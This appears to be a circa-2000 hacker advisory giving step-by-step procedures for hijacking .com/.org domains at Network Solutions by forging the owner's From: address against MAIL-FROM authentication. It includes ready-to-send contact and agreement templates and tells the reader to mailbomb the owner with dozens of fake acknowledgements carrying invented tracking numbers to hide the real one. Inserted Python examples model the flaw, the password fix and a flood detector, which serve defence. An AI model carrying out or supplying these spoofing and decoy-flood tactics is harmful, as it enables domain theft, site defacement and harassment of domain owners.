
Vulnerabilities in InterNIC's domain name handling system


The sole purpose of the information in this release is to point out flaws in InterNIC's domain name handling system; it is intended for educational use only. Since this is public knowledge, it should be in everyone's hands. The technique described below is an easy-to-follow procedure for stealing .com, .net, .org and .gov domain names, and thousands of domains are exposed to it.

This vulnerability has been publicly known for a long time, and there are ways to prevent it (see the fix at the end). The procedure lets an attacker take over a domain name and make an arbitrary web address (http://www.example.com) point to any web page they want on the Internet. This method of domain hijacking is constantly being used to hijack domain names and deface websites.


Details
Ingredients needed:
* A mailbomber, remailer or anonymous e-mail service that can spoof the From: address.
* Social engineering skills to time the e-mails.
* A throwaway e-mail account at hotmail.com or any other free service.

Exploit:
As the example for this advisory we will use the domain name example.org. Go
to http://www.networksolutions.com and click the link that says 'WhoIs'.
Now enter the domain name (example.org in this case) in the search field and click the 'Search' button. This shows the WhoIs information, which will look similar to the following:

Registrant:
Example (EX24-DOM)
   Residence

   Domain Name: EXAMPLE.ORG

   Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
      DOMAIN ADMIN  (ADM001)  ADMINEMAIL@EXAMPLE.COM

   Record last updated on 00-Jan-2000.
   Record created on 00-Jan-2000.
   Database last updated on 3-Feb-2000 14:29:53 EST.

   Domain servers in listed order:

   NS1.EXAMPLE.COM   1.2.3.4
   NS2.EXAMPLE.NET   1.2.3.5


Now you have two choices:

1) You can take full control of the domain by changing the administrative contact's information,
or
2) You can simply point the domain at another host and let the owner recover it in time.


Starting the first attack:

Let me first explain InterNIC's authentication system, since most readers will not have their own domain names. The problem with InterNIC's authentication is that they do not send a confirmation e-mail if the request arrives from the same e-mail address as the person who owns the domain name, i.e. the contact on record! Therefore, using this flaw, anyone who can spoof the contact's e-mail address can change any domain name's information. Confirmation is required from the person to whom the domain is about to be transferred, but that shouldn't be difficult, as that address is your own e-mail.

Here's a step-by-step:

- Go to http://www.networksolutions.com/
- Click the link that says 'Make Changes'.
- Enter the domain name example.org.
- You should be presented with 2 blue buttons.
- Click the one that says *Expert*.
- The next screen will have the title "Select the form that suits your needs".
- Click the link that says "Contact Form".
- You should then see a form with 2 fields.
- In the first field, enter the administrator's handle (for example.org the admin is ADM001).
- In the next field, enter his/her e-mail address (here it's ADMINEMAIL@EXAMPLE.COM).
- Change the option to 'Modify'.
- Now click 'Go to Contact Information'.
- Select MAIL-FROM and click 'Go to Contact Information Data'.
- You should now see all the information about the administrative contact for the domain name!
- In the e-mail field, change the e-mail address to your own fake address (in this case, evil@domain.com).
- Now click 'Go to Authentication Scheme Definition'.
- Again pick MAIL-FROM and enter the admin's e-mail (ADMINEMAIL@EXAMPLE.COM).
- Leave the bottom option set to 'No' and click 'Generate Contact Form'.
- You should now see a template with all the information, like this:

******** Please DO NOT REMOVE Version Number ********

Contact Version Number: 1.0

******** Please see attached detailed instructions ********

Authorization
0a. (N)ew (M)odify (D)elete ....: Modify
0b. Auth Scheme ................: MAIL-FROM
0c. Auth-Info ..................:

Contact Information
1a. NIC Handle .................: ADM001
1b. (I)ndividual (R)ole ........: Individual
1c. Name .......................: DOMAIN ADMIN
1d. Organization Name ..........: EXAMPLE
1e. Street Address .............:
1f. City .......................:
1g. State ......................:
1h. Postal Code ................:
1i. Country ....................:
1j. Phone ......................:
1k. Fax ........................:
1l. E-Mailbox ..................: evil@domain.com

Notify Information
2a. Notify Updates .............: POST-UPDATE
2b. Notify Use .................: USE AFTER

Authentication
3a. Auth Scheme ................: MAIL-FROM
3b. Auth-Info ..................: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N) ...............: NO

NOTE: Do NOT press the button at the bottom that says 'Mail this form to me'.
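The following is an added example, not part of the original advisory: a small Python model of the registry-side check that decides whether the template above may modify contact ADM001. The field codes and template layout are taken from the template above; the registry records, the hypothetical handle SAFE01, its password and the salted SHA-256 stand-in for the CRYPT-PW password hash are assumptions. It shows why a forged From: line is enough under MAIL-FROM, and why the same forgery fails once the contact has switched to CRYPT-PW.

```python
import hashlib
import hmac
import re

# One template line: "<code>. <label> ....: <value>", e.g. "1a. NIC Handle .....: ADM001"
FIELD_RE = re.compile(r"^\s*(\d[a-z])\.\s*(.*?)\s*\.*:\s*(.*)$")


def parse_template(text):
    """Map field codes such as '1a' or '3b' to their values."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(3).strip()
    return fields


def _pw_hash(password, salt):
    # Assumption: a salted SHA-256 stand-in for the password hash CRYPT-PW stored.
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed registry records keyed by NIC handle.  ADM001 is the contact from
# the WhoIs output above and still uses the MAIL-FROM default; SAFE01 is a
# hypothetical contact that switched to CRYPT-PW with password "correct horse".
ON_FILE = {
    "ADM001": {"scheme": "MAIL-FROM", "auth_info": "ADMINEMAIL@EXAMPLE.COM"},
    "SAFE01": {"scheme": "CRYPT-PW", "salt": "x9",
               "auth_info": _pw_hash("correct horse", "x9")},
}


def build_request(handle, new_email, auth_info=""):
    """The modify template from the walkthrough above, as the attacker mails it."""
    return (
        "Contact Version Number: 1.0\n"
        "Authorization\n"
        "0a. (N)ew (M)odify (D)elete ....: Modify\n"
        "0b. Auth Scheme ................: MAIL-FROM\n"
        f"0c. Auth-Info ..................: {auth_info}\n"
        "Contact Information\n"
        f"1a. NIC Handle .................: {handle}\n"
        "1b. (I)ndividual (R)ole ........: Individual\n"
        "1c. Name .......................: DOMAIN ADMIN\n"
        f"1l. E-Mailbox ..................: {new_email}\n"
    )


def authorize(template_text, from_header):
    """Registry-side decision: may this request modify the contact it names?"""
    fields = parse_template(template_text)
    record = ON_FILE.get(fields.get("1a", ""))
    if record is None:
        return False, "unknown handle"
    if record["scheme"] == "MAIL-FROM":
        # The flaw: a string compare against the From: header, which the
        # sender controls.  Nothing proves the mail ever left that mailbox.
        ok = from_header.strip().lower() == record["auth_info"].lower()
        return ok, "MAIL-FROM " + ("matched" if ok else "mismatch")
    if record["scheme"] == "CRYPT-PW":
        # The fix: the password must travel in 0c (Auth-Info); From: is ignored.
        ok = hmac.compare_digest(_pw_hash(fields.get("0c", ""), record["salt"]),
                                 record["auth_info"])
        return ok, "CRYPT-PW " + ("ok" if ok else "bad password")
    return False, "unsupported scheme"


def demo():
    """Three submissions, all with From: forged to the admin's address."""
    forged = "ADMINEMAIL@EXAMPLE.COM"
    hijack = authorize(build_request("ADM001", "evil@domain.com"), forged)[0]
    blocked = authorize(build_request("SAFE01", "evil@domain.com"), forged)[0]
    legit = authorize(build_request("SAFE01", "new@example.com", "correct horse"), forged)[0]
    return hijack, blocked, legit


if __name__ == "__main__":
    print(demo())
```

demo() returns (True, False, True): the forged request modifies ADM001, is rejected for SAFE01, and is accepted for SAFE01 only when the password is supplied in field 0c. The From: header plays no part in the CRYPT-PW branch, which is exactly why the fix at the end of this advisory works.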

Copy and paste this template into your anonymous mailer or mailbomber and you're ready to go, but WAIT! It's not that easy; now comes the hard part! When you send this message to hostmaster@networksolutions.com, a message similar to the following is sent to the administrator's e-mail address:


Subject: [NIC-000128.4r50] Your Mail
______________________________________________________________
This is an automated response to confirm that your message was received by hostmaster@networksolutions.com. This acknowledgement is NOT confirmation that your request has been processed. You will be notified when it has been completed.

If you need to correspond with us about this request, please include the tracking number [NIC-000128.4r50] in the subject line. The easiest way to do this is simply to reply to this message.

If you have not already done so, please visit our site with a WWW browser or by FTP to pick up the latest domain template, or to review the Domain Name Registration Service Agreement, at the URLs:

Domain Name Registration Service Agreement
http://www.networksolutions.com/leg...-agreement.html
Domain Name Registration Template
ftp://www.networksolutions.com/temp...in-template.txt

Sincerely,
Network Solutions Registration Services

***********************************************

***********************************************
IMPORTANT INFORMATION
***********************************************
On January 15, 2000, Network Solutions introduced Service Agreement Version 6.0. All versions of the Service Agreement will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement Version 6.0 template, located at
ftp://www.networksolutions.com/temp...in-template.txt
for all template applications.

The terms and conditions of service are available on our
Web site at: http://www.networksolutions.com/leg...-agreement.html.
************************************************

The zone files that make the Internet work are usually
updated twice a day, 7 days a week, at 5:00 AM and 5:00 PM
U.S. Eastern Standard Time. Requests completed before those times
will be included in that 12-hour zone file update and usually
begin to take effect within 5-6 hours.

If you want to modify or delete a record for an existing domain name,
you can do it online through our Service Agreement. You
may change the registrant's address, replace a contact/agent
with a different contact/agent, or change the primary and/or
secondary name server information.

To update existing contact information, such as postal address,
e-mail address or phone number, complete and submit the contact
form to hostmaster@internic.net. This form is available on our website at http://www.networksolutions.com

To register or update information about a name server,
complete and submit the host form to hostmaster@internic.net. This form is also available on our website.

Network Solutions Registration Services
e-mail: help@networksolutions.com


Now you must be thinking that this message would get you caught, but there is a way around this problem. Here you use your mailbomber to bomb the administrator with 20-30 messages that look like the one above, if you want your attack to succeed. The person would see 35 messages from the same address and therefore delete them all, and you would probably be safe. If they did e-mail someone about it, they would probably reply with the wrong tracking number. In the case above, the tracking number is [NIC-000128.4r50]. OK, here's another hard part: you have to open Notepad and generate similar-looking numbers yourself.
You should NEVER mailbomb the person with the same tracking number twice. What we mean is that you should never send more than one e-mail carrying [NIC-000128.4r50]; in the next e-mail, change [NIC-000128.4r50] to [NIC-000127.5089] or something else. Here is a list of some numbers we generated, just to give you a good idea of how the scheme works:

[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]

Remember to change the number in both places: in the subject and in the body of the e-mail!

In the example.org case you will send these e-mails to ADMINEMAIL@EXAMPLE.COM from hostmaster@internic.net. The message subject and body are as described above.

Stop after sending him/her 10-15 messages! Now it's time to e-mail hostmaster@networksolutions.com with our fake From address, ADMINEMAIL@EXAMPLE.COM. Again, this message is sent to hostmaster@networksolutions.com from ADMINEMAIL@EXAMPLE.COM with the template we created above:

******** Please DO NOT REMOVE Version Number ********

Contact Version Number: 1.0

******** Please see attached detailed instructions ********

Authorization
0a. (N)ew (M)odify (D)elete ....: Modify
0b. Auth Scheme ................: MAIL-FROM
0c. Auth-Info ..................:

Contact Information
1a. NIC Handle .................: ADM001
1b. (I)ndividual (R)ole ........: Individual
1c. Name .......................: DOMAIN ADMIN
1d. Organization Name ..........: EXAMPLE
1e. Street Address .............:
1f. City .......................:
1g. State ......................:
1h. Postal Code ................:
1i. Country ....................:
1j. Phone ......................:
1k. Fax ........................:
1l. E-Mailbox ..................: evil@domain.com

Notify Information
2a. Notify Updates .............: POST-UPDATE
2b. Notify Use .................: USE AFTER

Authentication
3a. Auth Scheme ................: MAIL-FROM
3b. Auth-Info ..................: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N) ...............: NO


NOTE: Do not put anything in the subject!

Just send one e-mail! Do NOT bombard hostmaster@networksolutions.com with more than one e-mail. That's pretty much it. Now
continue to bombard ADMINEMAIL@EXAMPLE.COM, changing the tracking number
each time, until you have used up 30-35 tracking numbers!

Now all you have to do is wait. After
24 hours you can go and change the domain's information, and
nobody will be there to stop you, because you are now the administrative
contact for the domain name!

NOTE: This attack only works on domains whose administrative contact is different from their technical contact!


Starting the second attack:

This attack succeeds even if the technical and administrative contacts are the same.
The procedure is basically the same, apart from the fact that this time:
- Go to http://www.networksolutions.com/
- Click the link that says 'Make Changes'.
- Enter the domain name example.org.
- You should be presented with 2 blue buttons.
- Click the one that says *Expert*.
- The next screen will have the title "Select the form that suits your needs".
- Click the link that says 'Service Agreement'.
- Now, when it asks for an e-mail address, type your own.
- You should now see many fields; don't panic!
- Go to the technical contact and change the handle to FreeServers', Hypermart's, etc. (see the handles listed below).
- Now comes the 'Nameserver Information'.
- Change the name servers to Hypermart's or FreeServers' name servers.
- If there is nothing in the 'Optional Information' fields after that, just delete them.
- Click 'Submit this form for processing'.
- That's it; the form will be sent to your e-mail address.
- When the form arrives in your mailbox, take just this part:

***** PLEASE DO NOT REMOVE the Version Number or any of the information
below when submitting this template to hostmaster@networksolutions.com. *****

Domain Version Number: 5.0

******** Email completed agreement to hostmaster@networksolutions.com ********


Agreement to be bound. By applying for Network Solutions' service(s) through our
online application process, or by applying for and registering a domain name
as part of our template application process or by e-mail using the service(s)
provided by Network Solutions under the Service Agreement, Version 5.0, you
acknowledge that you have read and agree to be bound by all terms and
conditions of this Agreement and any pertinent rules or policies that are or
may be published by Network Solutions.

Please see the Network Solutions Service Agreement, Version 5.0, located at
URL http://www.networksolutions.com/legal/service-agreement.html.


[URL ftp://www.networksolutions.com] [11/99]

Authorization
0a. (N)ew (M)odify (D)elete ...........: M
0b. Auth Scheme ......................: MAIL-FROM
0c. Auth-Info ........................:

1.  Comments .........................:

2.  Complete Domain Name .............: example.org

Organization Using Domain Name
3a. Organization Name ................: EXAMPLE
3b. Street Address ...................:
3c. City .............................:
3d. State ............................:
3e. Postal Code ......................:
3f. Country ..........................:

Administrative Contact
4a. NIC Handle (if known) ............: ADM001
4b. (I)ndividual (R)ole ..............: Individual
4c. Name (Last, First) ...............:
4d. Organization Name ................:
4e. Street Address ...................:
4f. City .............................:
4g. State ............................:
4h. Postal Code ......................:
4i. Country ..........................:
4j. Phone Number .....................:
4k. Fax Number .......................:
4l. E-Mailbox ........................:

Technical Contact
5a. NIC Handle (if known) ............: BDM002
5b. (I)ndividual (R)ole ..............: Individual
5c. Name (Last, First) ...............:
5d. Organization Name ................:
5e. Street Address ...................:
5f. City .............................:
5g. State ............................:
5h. Postal Code ......................:
5i. Country ..........................:
5j. Phone Number .....................:
5k. Fax Number .......................:
5l. E-Mailbox ........................:

Billing Contact
6a. NIC Handle (if known) ............: ADM001
6b. (I)ndividual (R)ole ..............: Individual
6c. Name (Last, First) ...............:
6d. Organization Name ................:
6e. Street Address ...................:
6f. City .............................:
6g. State ............................:
6h. Postal Code ......................:
6i. Country ..........................:
6j. Phone Number .....................:
6k. Fax Number .......................:
6l. E-Mailbox ........................:

Primary Name Server
7a. Primary Server Hostname ..........: NS1.EXAMPLE.COM
7b. Primary Server Netaddress ........: 1.2.3.4

Secondary Name Server(s)
8a. Secondary Server Hostname ........: NS2.EXAMPLE.NET
8b. Secondary Server Netaddress ......: 1.2.3.5


END OF AGREEMENT


For instructions, see:
http://www.networksolutions.com/help/inst-mod.html


- Now launch your anonymous mailer or mailbomber.
- From: the domain administrator (ADMINEMAIL@EXAMPLE.COM in this case).
- To: hostmaster@networksolutions.com
- Subject: (do not enter any subject; leave the field blank!)
- Body: the template you created above.
- You're ready to go, but before sending this e-mail to InterNIC, remember to bombard ADMINEMAIL@EXAMPLE.COM with look-alike e-mails carrying different tracking numbers, as we did in the first procedure.
- After sending 10-20 e-mails, send the above template to InterNIC.
- Continue bombarding with another 40 messages. Remember to generate 40-50 tracking numbers.
- This is basically it.

The domain will be transferred to FreeServers or Hypermart, and
you can then activate it from there under your own
e-mail address. Remember to use a fake e-mail address.

Nameservers and handles:
------------------------
Technical FreeServers Handle: FS4394
Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP Address: 209.210.67.153
Secondary Nameserver: NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154

Tech Hypermart Handle: DA3706-ORG
Primary Nameserver: NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address: 206.253.222.66

Tip...
Possible fixes:
Enable the CRYPT-PW password mechanism. That
should prevent anyone without the password from changing the domain's
information (see InterNIC's contact form for more information).
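Two checks a domain contact could run against the attacks above, added here as an example and not part of the original advisory. The first flags the decoy flood both procedures depend on: rather than trying to pick out the one genuine acknowledgement, it counts distinct [NIC-...] tracking numbers per sender inside a time window, since a burst of registrar acknowledgements for requests the contact never submitted is the alarm in itself. The second compares a saved WhoIs record with a fresh one and reports changed contact e-mailboxes or name servers, which is what the first and the second attack respectively change. The inbox, the threshold and the "after" WhoIs record are constructed for the example; the tracking-number layout and the baseline record follow the advisory.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tracking numbers as they appear in the acknowledgement subject, e.g. [NIC-000128.4r50]
TRACKING_RE = re.compile(r"\[(NIC-\d{6}\.[0-9a-z]{4})\]", re.IGNORECASE)


def detect_ack_flood(messages, window=timedelta(hours=24), threshold=5):
    """messages: (sender, subject, received) triples.  Returns {sender: [tracking
    numbers]} for every sender that delivered at least `threshold` distinct
    tracking numbers inside one `window`.  The threshold is an assumption."""
    per_sender = defaultdict(list)
    for sender, subject, received in messages:
        m = TRACKING_RE.search(subject)
        if m:
            per_sender[sender.lower()].append((received, m.group(1)))
    flagged = {}
    for sender, hits in per_sender.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):          # sliding window over arrival times
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if len({t for _, t in hits[start:end + 1]}) >= threshold:
                flagged[sender] = sorted({t for _, t in hits})
                break
    return flagged


def parse_whois(text):
    """Pull the contact e-mailboxes and the name server set out of a WhoIs
    record in the layout shown at the top of the advisory."""
    emails = {e.lower() for e in re.findall(r"[\w.+-]+@[\w.-]+\w", text)}
    nameservers, in_servers = set(), False
    for line in text.splitlines():
        if "servers in" in line.lower():
            in_servers = True
            continue
        if in_servers and line.strip():
            nameservers.add(line.split()[0].upper())
    return {"emails": emails, "nameservers": nameservers}


def diff_records(baseline, current):
    """List (what, before, after) for the fields the two attacks change."""
    b, c = parse_whois(baseline), parse_whois(current)
    changes = []
    for what, key in (("contact e-mail", "emails"), ("name servers", "nameservers")):
        if b[key] != c[key]:
            changes.append((what, sorted(b[key]), sorted(c[key])))
    return changes


# --- constructed sample data (not real mail or registry output) ------------
_T0 = datetime(2000, 1, 28, 9, 0)
SAMPLE_INBOX = [  # decoys from the remailer, one real ack, one unrelated mail
    ("hostmaster@internic.net", "[NIC-000127.5089] Your Mail", _T0),
    ("hostmaster@internic.net", "[NIC-000128.4rg7] Your Mail", _T0 + timedelta(minutes=3)),
    ("hostmaster@internic.net", "[NIC-000128.523f] Your Mail", _T0 + timedelta(minutes=7)),
    ("hostmaster@internic.net", "[NIC-000127.53d0] Your Mail", _T0 + timedelta(minutes=12)),
    ("hostmaster@internic.net", "[NIC-000129.r609] Your Mail", _T0 + timedelta(minutes=20)),
    ("hostmaster@networksolutions.com", "[NIC-000128.4r50] Your Mail", _T0 + timedelta(minutes=25)),
    ("hostmaster@internic.net", "[NIC-000128.3f6y] Your Mail", _T0 + timedelta(minutes=31)),
    ("friend@example.net", "lunch?", _T0 + timedelta(hours=1)),
]

BASELINE_WHOIS = """\
Registrant:
Example (EX24-DOM)

   Domain Name: EXAMPLE.ORG

   Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
      DOMAIN ADMIN  (ADM001)  ADMINEMAIL@EXAMPLE.COM

   Domain servers in listed order:

   NS1.EXAMPLE.COM   1.2.3.4
   NS2.EXAMPLE.NET   1.2.3.5
"""
# What the record looks like after the second attack (contact and NS changed).
HIJACKED_WHOIS = (BASELINE_WHOIS
    .replace("ADMINEMAIL@EXAMPLE.COM", "evil@domain.com")
    .replace("NS1.EXAMPLE.COM   1.2.3.4", "NS3.FREESERVERS.COM   209.210.67.153")
    .replace("NS2.EXAMPLE.NET   1.2.3.5", "NS4.FREESERVERS.COM   209.210.67.154"))

if __name__ == "__main__":
    print(detect_ack_flood(SAMPLE_INBOX))
    print(diff_records(BASELINE_WHOIS, HIJACKED_WHOIS))
```

On the sample inbox, detect_ack_flood flags hostmaster@internic.net with six distinct tracking numbers inside half an hour while the single genuine acknowledgement is left alone, and diff_records reports both the contact e-mail and the name server change. The practical lesson is the same as the advisory's: a flood of acknowledgements is a reason to reply to every tracking number and re-check the record, not to delete them all.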




//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
